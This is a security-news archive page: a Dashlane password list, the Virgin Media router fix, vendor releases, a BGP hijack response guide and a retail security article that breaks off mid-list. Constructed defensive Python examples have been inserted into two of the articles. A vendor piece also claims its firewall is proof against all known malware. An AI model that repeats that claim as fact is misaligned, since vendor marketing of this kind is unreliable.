Category Archives: Network Security

I Miss The 000000ld Kanye: West Tops Dashlane’s List of 2018’s “Worst Password Offenders”.

Dashlane today announced its third annual list of the “Worst Password Offenders.” The list highlights the high-profile individuals and organizations that had the most significant password-related blunders in 2018.

“Passwords are the first line of defense against cyberattacks,” said Emmanuel Schalit, CEO of Dashlane. “Weak passwords, reused passwords, and poor organizational password management can easily put sensitive information at risk.”

Dashlane found that the average internet user has over 200 digital accounts that require passwords, and the company projects this figure to double to 400 in the next five years. “The sheer number of accounts requiring passwords means everyone is prone to make the same mistakes as the Password Offenders,” states Schalit. “We hope our list serves as a wake-up call to everyone to follow the best password security practices.”

Dashlane’s “Worst Password Offenders” of 2018, beginning with the worst:

Kanye West: Kanye is no stranger to controversy and attained even more notoriety this year when he was captured unlocking his iPhone with the passcode “000000” during his infamous meeting at the White House. Having a weak passcode is risky enough, but brazenly flaunting poor password practices in a room full of TV cameras is as bad as it gets. To put it gently, Kanye needs to lock down his passwords and make them better, faster, stronger.

The Pentagon: It’s a shame that the Department of Defense holds the #2 spot this year (up two spots from #4 in last year’s list), but a devastating audit by the Government Accountability Office (GAO) found numerous cybersecurity vulnerabilities in several of the Pentagon’s systems. Among the disturbing issues was that a GAO audit team was able to guess admin passwords in just nine seconds, as well as the discovery that software for multiple weapons systems was protected by default passwords that any member of the public could have found through a basic Google search.

Cryptocurrency owners: As the value of cryptocurrencies reached record levels at the beginning of the year, scores of crypto owners had the potential to cash out—if they could remember their passwords. The news cycle was rife with reports of people resorting to desperate measures (including hiring hypnotists) to attempt to recover/remember the forgotten passwords to their digital wallets.

Nutella: Nutella came under fire for giving some of the nuttiest password advice of the year as the beloved hazelnut-and-chocolate spread company encouraged its Twitter followers to use “Nutella” as their password. As if the advice wasn’t bad enough, the company sent out the ill-advised tweet to celebrate World Password Day.

U.K. Law Firms: Researchers in the United Kingdom found over one million corporate email and password combinations from 500 of the country’s top law firms available on the dark web. Making matters worse, most of the credentials were stored in plaintext.

Texas: Everything is bigger in Texas, including the cybersecurity gaffes. The Lone Star State left over 14 million voter records exposed on a server that wasn’t password protected. This blunder meant that sensitive personal information from 77% of the state’s registered voters, including addresses and voter history, was left vulnerable.

White House Staff: Last year, two White House officials made our list: President Trump took the (un)coveted title of 2017’s Worst Password Offender for a variety of poor cybersecurity habits, while Sean Spicer was included for tweeting his password. This year they passed the baton to another staffer who made the mistake of writing down his email login and password on official White House stationery. This mistake was exacerbated as he accidentally left the document at a Washington, D.C. bus stop.

Google: The search engine giant has historically been buttoned up in terms of cybersecurity, but this year, an engineering student from Kerala, India hacked one of their pages and got access to a TV broadcast satellite. The student didn’t even need to guess or hack credentials; he logged in to the Google admin pages on his mobile device using a blank username and password.

United Nations: The organization tasked with maintaining international peace has a security problem. U.N. staff were using Trello, Jira, and Google Docs to collaborate on projects, but forgot to password protect many of their documents. This meant anyone with the correct link could access secret plans, international communications, and plaintext passwords.

University of Cambridge: A plaintext password left on GitHub allowed anyone to access the data of millions of people being studied by the university’s researchers. The data was being extracted from the Facebook quiz app myPersonality and contained the personal details of Facebook users, including intimate answers to psychological tests.

Learn from the mistakes of this year’s Password Offenders:

1. Password protect all accounts: Whether it’s a server, email account, or an app, you should always secure your data with passwords as they’re the first, and often only, line of defense between hackers and your personal information.

2. Use strong passwords: Never use passwords that are easy to guess or that contain names, proper nouns, or things people can easily research about you—like your favorite hazelnut spread! All your passwords should be longer than eight characters and include a mix of random letters, numbers, and symbols. Even better, use a password generator to come up with them for you.

3. Never reuse passwords: Every one of your accounts needs a unique password. The risk in password reuse is that hackers can use passwords from compromised accounts to easily access other accounts. The only protection against this is to have a different password for every account.

About Dashlane

Dashlane simplifies and secures your digital identity—all your personal information that lives online. Across all platforms and devices, the intuitive Dashlane app automatically fills and stores passwords, personal data, and payment details to help you manage, monitor, and protect your digital identity. Available in 11 languages and trusted by 10+ million people in 180 countries (and growing), it’s the complete, global solution for living safely and seamlessly online—at home, at work, and everywhere in between.

With offices in New York City, Paris, and Lisbon, Dashlane has raised over $70 million in venture funding to create a safe and effortless solution for all citizens of the digital world. Learn more at dashlane.com.

The post I Miss The 000000ld Kanye: West Tops Dashlane’s List of 2018’s “Worst Password Offenders”. appeared first on IT Security Guru.

Virgin Media Fixes Super Hub 3.0 Security Flaws.

Virgin Media has fixed multiple vulnerabilities in its Super Hub 3.0 broadband modem, after a researcher from global cyber security and risk mitigation expert, NCC Group, proved that they could enable hackers to remotely monitor network traffic and execute commands on the devices.

The firmware security flaws, found in a third-party router, were discovered and disclosed to Virgin Media by Balazs Bucsay, managing security consultant at NCC Group, in 2017.

Bucsay was able to chain vulnerabilities together to create a remote exploit that could be actioned with no authentication from the Super Hub 3.0 owner.

By embedding the exploit in webpages and sending them to users via spear phishing emails, hackers could have controlled and installed backdoors in millions of modems, potentially giving them access to users’ internal home networks.

The vulnerabilities were located in multiple parts of the Super Hub 3.0’s firmware, including different services and additional web-related files.

By taking advantage of three different static cookies within the firmware’s web service binary, Bucsay was able to bypass its authentication and authorisation procedures and access all functionality of the device with administrator privileges.

Commenting on the research, Balazs Bucsay said: “This discovery should alert other internet service providers to the importance of checking and upgrading the security of any third-party hardware they use.

“Vendors often supply the same firmware with small modifications to white label the product for different customers.

“Virgin Media should be praised for taking these vulnerabilities seriously in order to protect their customers, and it’s vital that other providers follow their lead by upgrading their firmware.”

NCC Group responsibly disclosed the Super Hub vulnerabilities to Virgin Media in March 2017, after carrying out dedicated research to find them during the winter of 2016-2017. After working with NCC Group to fix the reported issues, Virgin Media rolled out a new firmware (version 9.1.116.608) in July 2018.

A detailed description of the research can be found in this blog.

The post Virgin Media Fixes Super Hub 3.0 Security Flaws. appeared first on IT Security Guru.

BT To Deliver The Latest SD-WAN And Cyber Security Service For IXOM.

BT today announced that it has signed a contract to deploy a new generation of network technology for IXOM, a market leader in chemicals manufacturing and distribution in Australia and New Zealand. It will see IXOM benefit from BT’s latest software-defined wide area networking (SD-WAN) and cyber security managed services as it shifts applications and data to the cloud to drive agility, efficiency and innovation.

IXOM’s new network will connect over 1000 employees at 55 sites across 14 countries. It will support the company’s digital transformation by delivering over seven times more bandwidth than its existing infrastructure and offer a step change in resilience with dual connectivity to 35 major sites.

It will be built around BT Agile Connect, a BT managed service based on an SD-WAN 2.0 solution by Nuage Networks from Nokia. This offers enhanced control and understanding of network infrastructure and traffic flows, a much faster, simpler and more secure way of setting up new sites, reduced complexity and lower costs.

BT will also deliver a 24×7 global cyber threat detection, investigation and response service. Managed from BT’s Australian Cyber Security Operation Centre and interfacing directly with IXOM’s in-house team, it will be based on a market-leading security information and event management (SIEM) platform combined with specialist cyber analyst services. This will help protect IXOM from rapidly evolving threats.

Rowan Start, head of IT for IXOM, said: “We are creating a resilient and agile technology environment to support our cloud applications and services. It will come with the ability to detect and respond to cyber threats in near real time. We chose BT because of its deep expertise in networking, understanding of our unique operational environment and its ability to seamlessly integrate security services with our own team to create a true partnership model.”

Bernadette Wightman, managing director, resources, manufacturing and logistics, BT said: “Managing risk is a key consideration of any digital transformation programme. That’s why companies such as IXOM look to trusted partners such as BT who can help them securely introduce the latest cloud-optimised network technologies. IXOM will benefit not only from the improved agility and control that our SD-WAN managed services offer but also the reassurance that they’re working with one of the world’s leading cyber security practices. It’s a superb example of how our Dynamic Network Services programme is helping customers deliver their digital transformation.”

BT’s Dynamic Network Services programme is designed to give customers more choice, security, resilience, service and agility in the roll-out of future networks that support digital transformation. The programme helps customers remove barriers to adoption of SD-WAN and NFV by answering questions about which technologies to use as well as when and how to implement, configure and integrate them with existing networks to create a hybrid infrastructure fit for the digital age.

The post BT To Deliver The Latest SD-WAN And Cyber Security Service For IXOM. appeared first on IT Security Guru.

Why You Need a BGP Hijack Response Plan

The vast majority of computer security incidents involve some sort of phishing or malware. Typically, this is the type of incident that receives the most attention from organizations, and for which security controls are established. And rightfully so — malware that exploits a vulnerability or human error can cause significant damage to an organization.

However, attacks targeting an organization’s network or internet infrastructure components — such as Border Gateway Protocol (BGP) — have been generally overlooked, even as they gain traction. BGP hijack attacks are still far less common than distributed denial-of-service (DDoS) attacks, but several recent events have turned this unusual method into headlines.

What Is BGP?

Some consider BGP the glue that ties the internet together. Purists might argue that it is the Domain Name System (DNS) that plays this role, given that there can be glue records in a zone file. However, without BGP, your packets would not arrive at their intended destinations.

BGP is the routing protocol of the internet. It is used to determine the most efficient way to route data between independently operated networks, known as autonomous systems (AS). In technical terms, an AS is a collection of IP prefixes that are assigned an Autonomous System Number (ASN).

Put simply, BGP is the road map to the internet, whereas DNS is the phone book.

How BGP Routing Works

A BGP router uses a large table called the routing information base (RIB), which describes the networks it can reach and what the most efficient paths to these networks are. BGP peers are systems (or neighbors) from which the router receives information (networks or prefixes). These are configured manually.

Each peer passes on the routes it has learned from its own peers, so the router also receives routing information it was never told about directly. By combining the information coming from different peers, the router can then work out the most efficient path to a destination.

What Is BGP Hijacking?

In short, a BGP attack is a configuration of an edge router to announce prefixes that have not been legitimately assigned to it. If the injected announcement is more specific (a longer prefix, which routers prefer over a shorter one) than the legitimate one, then the traffic will be rerouted to the injected announcement. In this way, an attacker can broadcast false prefix announcements, polluting the routing table of all its connected peers.

Because of the propagation of routes through connected networks, if one peer includes the malicious information in its routing table, this information can be quickly propagated to other peers. Routing announcements are accepted almost without any validation, making a successful BGP hijack relatively easy.

There are two primary types of attacks: A complete hijack attack overtakes a specific IP prefix, whereas in a partial hijack, the attacker competes with the legitimate source by announcing the same prefix with the same efficiency.

There are also unintentional cases. Human error can cause the same effect as a BGP hijack attack. This is often referred to as a route leak.

Recognize the Impact

The most obvious impact of BGP hijacking is that packets do not take their optimal route, slowing down users’ connections to the network.

Far worse, attackers can black hole an entire network, including the organization’s services, thus resulting in an outage resembling a DDoS attack. Similarly, attackers can censor certain sources of information by black holing specific networks.

The rerouting makes the attacker a middleman of the network flow — meaning he or she can eavesdrop on certain parts of the communication, or in some cases even alter the traffic. They can also redirect traffic from your customers or users to malicious sites pretending to be part of your network. This can result in the theft of information or credentials or delivery of malware that exploits weaknesses.

In addition, spammers can abuse the good reputation of your ASN to conduct spam runs. This can have a negative effect on your network if it gets blocked by spam filters.

Watch for a Secondary Attack

In some cases, the BGP hijack might not be the attacker’s final objective. The goal might be to steal credentials or divert your users to sources that could potentially exploit their systems.

During the incident response phase, it’s important to be aware of this possibility and try to gather as much material as possible that could help you analyze these attacks. Valuable data sources include passive DNS, Secure Sockets Layer (SSL) certificate history and full packet captures.

How to Detect a BGP Hijack

One of the problems with BGP attacks is that they do not always last very long, so by the time you know an attack is taking place, the situation can already be restored to normal. This stresses the importance of implementing monitoring tools and establishing an efficient alerting workflow.

Start by monitoring the BGP routes that relate to your AS. You can set up your own monitoring solutions, but you can just as well rely on publicly available sources, such as BGPMon and Oracle Dyn, to do the heavy lifting for you.
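The monitoring described above boils down to one comparison: every announcement of your address space seen by a route collector should carry your origin ASN. The following is an added example (not code from the original article or from any monitoring service) that performs that comparison over a constructed feed, distinguishing the competing-origin case from the more-specific case the article calls a complete hijack. Prefixes, ASNs and collector names are constructed placeholders.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: the prefixes our organisation legitimately originates,
# mapped to our origin ASN. RFC 5737 documentation prefixes and private-use
# ASNs (RFC 6996) stand in for real address space and real ASNs.
OUR_PREFIXES: Dict[str, int] = {
    "203.0.113.0/24": 64500,
    "192.0.2.0/24": 64500,
}


@dataclass(frozen=True)
class Announcement:
    """One route as reported by a route collector or looking glass."""
    prefix: str
    as_path: Tuple[int, ...]   # leftmost = collector's neighbour, rightmost = origin AS
    seen_by: str               # which collector / vantage point reported it


@dataclass(frozen=True)
class Alert:
    kind: str             # "origin_mismatch" (partial hijack) or "more_specific" (complete hijack)
    prefix: str           # the offending announcement
    origin: int           # the foreign origin ASN
    expected_prefix: str  # the legitimate prefix it collides with
    seen_by: str


def classify(ann: Announcement, ours: Dict[str, int]) -> Optional[Alert]:
    """Return an Alert if `ann` conflicts with our legitimate announcements.

    origin_mismatch: our exact prefix announced with a foreign origin AS, i.e. a
        competing announcement of equal specificity (the article's partial hijack).
    more_specific: a sub-prefix of our space announced by a foreign origin.
        Longest-prefix matching makes it win everywhere it propagates (the
        complete hijack case).
    Announcements unrelated to our space, and more-specifics we originate
    ourselves (traffic engineering), return None.
    """
    net = ipaddress.ip_network(ann.prefix, strict=True)
    origin = ann.as_path[-1]
    for our_prefix, our_asn in ours.items():
        our_net = ipaddress.ip_network(our_prefix, strict=True)
        if net.version != our_net.version:
            continue
        if net == our_net:
            if origin != our_asn:
                return Alert("origin_mismatch", ann.prefix, origin, our_prefix, ann.seen_by)
            return None
        if net.subnet_of(our_net):
            if origin != our_asn:
                return Alert("more_specific", ann.prefix, origin, our_prefix, ann.seen_by)
            return None
    return None


def scan(feed: List[Announcement], ours: Dict[str, int] = OUR_PREFIXES) -> List[Alert]:
    """Run classify() over a batch of announcements and collect the alerts."""
    return [a for a in (classify(ann, ours) for ann in feed) if a is not None]


# Constructed sample feed, shaped like what a monitoring job would pull from a
# public route-collector API. Only the two foreign-origin entries should alert.
SAMPLE_FEED = [
    Announcement("203.0.113.0/24", (64501, 64500), "collector-a"),    # legitimate
    Announcement("203.0.113.0/25", (64502, 64500), "collector-b"),    # our own more-specific
    Announcement("203.0.113.128/25", (64503, 64496), "collector-b"),  # more-specific hijack
    Announcement("192.0.2.0/24", (64501, 64512), "collector-a"),      # competing origin
    Announcement("198.51.100.0/24", (64504, 64513), "collector-c"),   # unrelated space
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_FEED):
        print(f"{alert.kind}: {alert.prefix} from AS{alert.origin} "
              f"(collides with {alert.expected_prefix}) seen by {alert.seen_by}")
```

Because an attacker can also forge the AS path so that the origin looks legitimate, treat this origin check as the first filter and correlate alerts across several collectors before escalating.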

Build an Incident Response Plan

Proper reaction to a BGP hijack starts with an incident response plan. Unfortunately, this isn’t the type of incident for which you can set up a simple fallback solution or defensive security control. Nor is it one that you can easily detect.

That’s because BGP attacks take place outside the network of an organization. A well-conducted BGP hijack can interfere with traffic without your users ever noticing something was wrong. You might be able to convince your ISP to remove the false route or request it to convince its peers to drop these announcements.

For BGP hijack attacks, the containment, eradication and recovery phases of an incident response plan overlap. Because the route announcements will spread very quickly, containment might be a real challenge.

If you can’t free up the resources to develop a dedicated incident response plan, then you can reuse parts of your plan for combating DDoS attacks.

Be Prepared

Most organizations do not have their own ASN and must rely on the measures of their upstream internet service provider (ISP). But there are ways to prepare:

  • Understand which network providers your organization uses. Does it rely on one single network provider or multiple? An AS relation model can give you insight into this.
  • Once you have listed your network providers, reach out and ask them what precautions or response plans they have with regard to BGP security. You could start by asking for a high-level overview of the peering policy and what agreements toward protection they have in place.
  • Build good working communication channels with your network providers. Next to the normal abuse contact, these should also include escalation paths.
  • Establish out-of-band communication channels via another network provider. Use these channels to inform your customers in case of an attack. Possible options would be social media or a communication page hosted at a cloud provider (take phishing into account).

If you own an ASN, there are some additional measures to take:

  • Write down your peering policy and make sure everyone understands the BGP interconnection policy.
  • Implement the BGP peering best current practices (BCPs).
  • Review and implement the best practices from Mutually Agreed Norms for Routing Security (MANRS).
  • Specify an AS path. Be aware that this can quickly backfire since the intent of the system is to find the best path automatically. Introducing manual paths will weaken the system.
  • Limit the number of prefixes that can be received to prevent being flooded with announcements.
  • Implement route filtering.
  • Filter bogons, the IP prefixes that should not be allowed on the internet.
  • Use a form of authentication before accepting announcements.
  • Implement BGP time to live (TTL) checks, rejecting updates from routers located further away from you.
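Three of the items above (prefix limits, bogon filtering and TTL checks) are simple enough to model in a few lines. The following is an added example, not code from the original article or from any router vendor, that simulates the inbound policy a BGP speaker applies to each UPDATE from a peer: a GTSM-style TTL floor (RFC 5082), a prefix-length filter, a bogon filter and a maximum-prefix limit that tears the session down when exceeded. Peer names, prefixes and TTLs are constructed.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import List, Tuple

# Well-known IPv4 bogons (private, loopback, link-local, CGNAT, benchmark,
# multicast, reserved). The RFC 5737 documentation ranges are bogons too but are
# left out here so the constructed sample can use them as stand-ins for public
# space. A production filter should be generated from a maintained bogon list.
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.0.0.0/24", "192.168.0.0/16", "198.18.0.0/15",
    "224.0.0.0/4", "240.0.0.0/4",
)]

GTSM_TTL = 255  # RFC 5082: protocol packets are sent with TTL 255


@dataclass
class Peer:
    name: str
    max_prefixes: int            # maximum-prefix limit for this session
    max_hops: int = 1            # GTSM trust radius; 1 = directly connected
    accepted: List[str] = field(default_factory=list)
    session_up: bool = True


@dataclass(frozen=True)
class Update:
    prefix: str
    ttl: int     # IP TTL of the packet carrying the BGP UPDATE, as received


def is_bogon(net) -> bool:
    return any(net.overlaps(b) for b in BOGONS)


def evaluate(peer: Peer, upd: Update) -> Tuple[bool, str]:
    """Apply the inbound checks in order; return (accepted, reason).

    Mutates `peer`: accepted prefixes are recorded, and the session is marked
    down once the maximum-prefix limit is exceeded, which is the default
    behaviour of most implementations.
    """
    if not peer.session_up:
        return False, "session down"
    # GTSM: a packet from a peer within max_hops cannot arrive with a TTL lower
    # than 255 - max_hops, so anything lower is spoofed or from too far away.
    ttl_floor = GTSM_TTL - peer.max_hops
    if upd.ttl < ttl_floor:
        return False, f"ttl {upd.ttl} below GTSM floor {ttl_floor}"
    net = ipaddress.ip_network(upd.prefix, strict=False)
    # Route filtering: refuse prefixes outside the lengths normally carried
    # in the global IPv4 table (/8 to /24).
    if net.version == 4 and not 8 <= net.prefixlen <= 24:
        return False, f"prefix length /{net.prefixlen} outside /8-/24"
    if is_bogon(net):
        return False, "bogon prefix"
    if upd.prefix in peer.accepted:
        return True, "already accepted"      # a re-announcement does not count twice
    if len(peer.accepted) >= peer.max_prefixes:
        peer.session_up = False
        return False, "maximum-prefix exceeded, session torn down"
    peer.accepted.append(upd.prefix)
    return True, "accepted"


def run_sample() -> Tuple[List[Tuple[str, bool, str]], Peer]:
    """Feed a constructed sequence of UPDATEs to a directly connected peer."""
    peer = Peer("upstream-1", max_prefixes=2, max_hops=1)
    updates = [
        Update("203.0.113.0/24", 255),   # accepted
        Update("10.0.0.0/8", 255),       # bogon
        Update("192.0.2.0/24", 253),     # TTL too low for a directly connected peer
        Update("203.0.113.0/25", 255),   # too specific
        Update("198.51.100.0/24", 254),  # accepted (254 is still within the floor)
        Update("192.0.2.0/24", 255),     # third distinct prefix: limit exceeded
        Update("198.51.100.0/24", 255),  # session already down
    ]
    results = []
    for upd in updates:
        ok, reason = evaluate(peer, upd)
        results.append((upd.prefix, ok, reason))
    return results, peer


if __name__ == "__main__":
    for prefix, ok, reason in run_sample()[0]:
        print(f"{prefix:18} {'ACCEPT' if ok else 'REJECT'}  {reason}")
```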

If you want to exercise your plan, you can, for example, make use of a virtual machine (VM) with the option to load more than 500,000 BGP routes.

Consider Automated Response Tools

A key element in fighting BGP hijacking is accurate and fast detection that enables flexible and equally fast mitigation of these events. This is where the Automatic and Real-Time dEtection and MItigation System (ARTEMIS) can provide future help.

ARTEMIS, presented in a research paper by the Center for Applied Internet Data Analysis (CAIDA), is a self-operated and unified detection and mitigation approach based on control-plane monitoring. Although still in development, the project shows potential to help network providers address these attacks.

The last phase in incident response — learning lessons — calls for collecting the necessary information to update and improve your plan, especially for the preparation and detection phases. Review whether all the communication channels worked as expected, the escalation paths gave the expected results and you were able to detect the attack in time. The best response plan is prevention.

The post Why You Need a BGP Hijack Response Plan appeared first on Security Intelligence.

NeuVector Expands Kubernetes Security Solution With Release Of Containerd And CRI-O Run-Time Support.

NeuVector, the leader in Container Network Security, today announced containerd and CRI-O run-time support. The Kubernetes security company is unveiling these new additions to its platform at KubeCon + CloudNativeCon North America 2018, where NeuVector is participating as an exhibitor and conference sponsor. Attendees are invited to learn how customers use NeuVector – and get 1:1 demos of the platform’s new capabilities – at booth S/E24. KubeCon + CloudNativeCon North America 2018 takes place December 10-13 in Seattle.

Enterprises are increasingly taking advantage of Kubernetes throughout the entire application development process and into production. This is fueling an industry shift toward implementing robust security measures from the beginning of the development lifecycle all the way through to live containerized production environments. NeuVector’s solution is specifically designed to meet these critical requirements for fully integrated monitoring and security that protects container environments from external and internal security threats across the entire build-ship-run lifecycle. Successfully delivering its unique Kubernetes security solution has seen NeuVector’s customer base – from name-brand enterprises to emerging startups – grow 300% over the past year.

NeuVector is now making its multi-vector container firewall available to more security-conscious businesses by introducing support for containerd and CRI-O container run-time technologies. Containerd is an industry standard container run-time built to emphasize simplicity, robustness, and portability – while managing the complete container lifecycle of its host system. NeuVector, a “Built on IBM Cloud” partner, has been testing the containerd version on the latest IBM Cloud Kubernetes Service version, which uses the containerd run-time.

CRI-O is an implementation of the Kubernetes container run-time interface enabling OCI compatible run-times – essentially functioning as a lightweight alternative to Docker or other solutions as a run-time for Kubernetes, including Red Hat OpenShift. With this newly added support, organizations using containerd or CRI-O can now easily deploy NeuVector to secure their container environments from initial development all the way through production.

“As enterprise container strategies mature and increasingly move into production environments, we’re excited to further strengthen our Kubernetes security offering with today’s containerd and CRI-O run-time support releases – and KubeCon is the perfect venue to unveil these important additions,” said Gary Duan, CTO, NeuVector. “We invite attendees to come by to see how we can fit into their container security strategies throughout the entire application development lifecycle.”

“NeuVector is the strongest player in the nascent Kubernetes security market, giving us the ability to both monitor and visualize the network traffic we’re generating, plus a complete static analysis offering for our container base layers,” said Element’s Vice President of Engineering, Sean McCormick. “By using NeuVector’s end-to-end container security solution, I’m confident that we’re detecting attacks from both malicious containers containing injected vulnerabilities (which are becoming all too common these days) and from more traditional intrusion vectors. I sleep just a bit easier knowing these kinds of threats will be automatically detected and addressed. With NeuVector in our security quiver, we can confidently tell our customers that the Element Platform is secure against bad actors.”

The post NeuVector Expands Kubernetes Security Solution With Release Of Containerd And CRI-O Run-Time Support. appeared first on IT Security Guru.

Next-Generation Firewalls Are The Best Medicines For Your Network.

By Ronald Sens, EMEA Director for A10 Networks

As viruses become more sophisticated, malware must be detected all the way down to its DNA.

The winter season is peak time for infection and disease across the UK. But the old saying “prevention is better than cure” is not only relevant to our personal health, but also to our networks and IT systems.

In corporate networks, the classic defence against malware and other external attacks is usually split up between two solutions: a firewall and a traditional antivirus program. The firewall is similar to a gate that only allows authorised personnel into the network and the virus program is a guard capturing those who attempt to sneak in undetected.

Balancing act

The classic defence of using two solutions was put into place because neither solution alone could accurately protect the network. The two needed to work together in order to achieve maximum effect and coverage.

Traditional firewalls simply followed pre-determined web protocols and lacked the intelligence of next-generation firewalls. This means that the classic firewall lacked the ability to distinguish between different kinds of web traffic. The inability to distinguish between legitimate traffic and abnormal malicious traffic meant that firewalls either accepted or rejected all the traffic sent its way. Enterprises needed a more robust form of security with newer, more complex, rules. This is why traditional antivirus programs were paired up with firewalls.

Antivirus software is reactive and while these programs can deal with a threat, they only do so once that threat has entered the network. Depending on the number of threats attacking simultaneously and the sophistication of the attack an antivirus program is not powerful enough to keep the network safe.

However, when paired with a firewall that prevents all traffic entering the network the antivirus has the chance to scan the traffic and identify it. The antivirus can distinguish between the good and the bad traffic and relay this information to the firewall so it can only let in the approved traffic. The system works but it is flawed. Time is wasted waiting for the antivirus to identify the traffic and inform the firewall, and if one of the two was to go down then the whole system crashes.

This kind of defence previously used to be enough, but as enterprise networks get more complex and as the types of external threats become more varied, having two separate solutions working together is just not sufficient.

Convergent Firewall – the impenetrable dome

The problem surrounding a two-solution balancing act can be addressed by next-generation firewalls, and one in particular is the Convergent Firewall (CFW). The CFW intelligently recognises users who have permissions to prevent unauthorised attackers and malicious infiltrators from having access, and in some cases outright destroys the invader.

In order for CFW to be able to guarantee this comprehensive protection, a large volume of data and files is fed into the program in advance and broken down in detail. With the assistance of machine learning, the CFW is proof against all known malware and viruses, and can adapt to future threats. It can also distinguish between normal and abnormal behaviour from users within the network. This accurate analysis enables CFW to detect malware in real time using digital DNA and thereby prevent the majority of malicious attacks.

To understand why this strategy makes sense, it helps to think again about the approaching flu season. The CFW is less of a conventional doctor than a kind of super medicine that can scan people down to the molecular level. It does this in order to be able to judge exactly whether a disease is present, what symptoms are to be expected and how the disease can best be cured. It’s the perfect medicine for a network in the middle of the flu season.

The post Next-Generation Firewalls Are The Best Medicines For Your Network. appeared first on IT Security Guru.

5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays

This is the second article in a two-part series about retail cybersecurity during the holidays. Read part one for the full list of recommendations.

The holiday shopping season offers myriad opportunities for threat actors to exploit human nature and piggyback on the rush to buy and sell products in massive quantities online. Our previous post covered some network security basics for retailers. Let’s take a closer look at how retailers can properly configure and monitor their networks to help mitigate cyberattacks and provide customers with a safe shopping experience during the holiday season.

1. Take a Baseline Measurement of Your Network Traffic

Baselining is the process of measuring normal amounts of traffic over a period of days or even weeks to discern any suspicious traffic peaks or patterns that could reveal an evolving attack.

Network traffic measurements should be taken during regular business hours as well as after hours to cover the organization’s varying activity phases. As long as the initial baseline is taken during a period when traffic is normal, the data can be considered reliable. An intrusion detection system (IDS) or intrusion prevention system (IPS) can then assist with detecting abnormal traffic volumes — for example, when an intruder is exfiltrating large amounts of data when offices are closed.

Below are some factors to consider when performing a baseline measurement that could be helpful in detecting anomalies:

  • Baseline traffic on a regular basis.
  • Look for atypical traffic during both regular and irregular times (e.g., after hours).
  • Set alarms on an IDS/IPS for high and low thresholds to automate this process. Writing signatures specific to your company’s needs is a key element to an IDS/IPS working effectively and should be carried out by trained security specialists to avoid false alarms.
  • Investigate any discrepancies upon initial discovery and adjust thresholds accordingly.
  • Consider using an endpoint detection and response (EDR) solution to help security teams better identify threats, and to allow operations teams to remediate endpoints quickly and at scale.
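The baselining steps above, as an added example that is not part of the original article: a week of constructed hourly outbound byte counts is split into the article's regular and after-hours buckets, a mean and standard deviation is computed for each, and new observations are flagged when they cross a high or low threshold of k standard deviations (the value you adjust after investigating discrepancies). Office hours, traffic volumes and the observations are all constructed.

```python
import statistics
from typing import Dict, List, Optional, Tuple

# Constructed: the retailer's office hours; everything else is "after hours".
BUSINESS_HOURS = range(9, 18)


def bucket(hour: int) -> str:
    """Map an hour of day to the article's regular / irregular time classes."""
    return "business" if hour in BUSINESS_HOURS else "after_hours"


def build_baseline(samples: List[Tuple[int, int, int]]) -> Dict[str, Tuple[float, float]]:
    """samples are (day, hour, bytes_out) totals for one-hour windows.

    Returns, per bucket, the mean and population standard deviation of the
    outbound byte count; this is the baseline later observations are judged against.
    """
    per_bucket: Dict[str, List[int]] = {"business": [], "after_hours": []}
    for _day, hour, bytes_out in samples:
        per_bucket[bucket(hour)].append(bytes_out)
    return {k: (statistics.mean(v), statistics.pstdev(v)) for k, v in per_bucket.items()}


def check(baseline: Dict[str, Tuple[float, float]], hour: int,
          bytes_out: int, k: float = 3.0) -> Optional[str]:
    """Compare one observed hour with the baseline for its bucket.

    Returns "high" above mean + k*stdev (e.g. bulk exfiltration after hours),
    "low" below mean - k*stdev (e.g. a sales or logging system gone quiet),
    or None when the window is inside the expected band.
    """
    mean, stdev = baseline[bucket(hour)]
    high = mean + k * stdev
    low = max(0.0, mean - k * stdev)
    if bytes_out > high:
        return "high"
    if bytes_out < low:
        return "low"
    return None


def constructed_history(days: int = 7) -> List[Tuple[int, int, int]]:
    """Constructed hourly outbound totals: roughly 500 MB per business hour and
    20 MB per after-hours hour, with a deterministic +/-2% wobble so the
    standard deviation is non-zero."""
    rows = []
    for day in range(days):
        for hour in range(24):
            base = 500_000_000 if bucket(hour) == "business" else 20_000_000
            wobble = ((day + hour) % 5) - 2           # -2 .. +2 percent
            rows.append((day, hour, base + base * wobble // 100))
    return rows


BASELINE = build_baseline(constructed_history())

# Constructed observations for a new day: (hour, bytes_out)
OBSERVATIONS = [
    (2, 900_000_000),    # 02:00, 900 MB out: far above the after-hours band
    (11, 5_000_000),     # 11:00, 5 MB out: the storefront has gone quiet
    (11, 490_000_000),   # an ordinary business hour
    (2, 20_500_000),     # an ordinary after-hours hour
]


def triage(observations=OBSERVATIONS, baseline=BASELINE) -> List[Tuple[int, Optional[str]]]:
    """Return (hour, verdict) for each observation; None means within baseline."""
    return [(hour, check(baseline, hour, b)) for hour, b in observations]


if __name__ == "__main__":
    for hour, verdict in triage():
        print(f"{hour:02d}:00  {verdict or 'normal'}")
```

In a real deployment the samples would come from flow exports or IDS/IPS volume counters, and the per-bucket thresholds would feed the high and low alarms the list above describes.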


2. Run a Penetration Test Before It’s Too Late

A key preventative measure for retailers with a more mature security posture is running a penetration test. Simply put, the organization’s security team can allow a white hat hacker, or penetration tester, to manually try to compromise assets using the same tactics, techniques and procedures (TTPs) as criminal attackers. This is done to ascertain whether protections applied by the organization are indeed working as planned and to find any unknown vulnerabilities that could enable a criminal to compromise a high-value asset.

Manual testing should be performed in addition to automated scanning. Whereas automated tools can find known vulnerabilities, manual testing finds the unknown vulnerabilities that tools alone cannot find. Manual testing also targets the systems, pieces of information and vulnerabilities most appealing to an attacker, and specifically focuses on attempting to exploit not just technical vulnerabilities within a system, but business logic errors and other functionality that, when used improperly, can grant unintended access and/or expose sensitive data.

The key to a penetration test is to begin by assessing vulnerabilities and addressing as many of them as possible prior to the test. Then, after controls are in place, decide on the type of test to carry out. Will it be a black box test, where the testers receive no information about the target’s code and schematics? Or will it be a white box test, where organizations fully disclose information about the target to give the tester full knowledge of how the system or application is intended to work? Will it be in a very specific scope and only include customer-facing applications?

It can be helpful to scope a penetration test by taking the following three steps prior to launching the testing period:

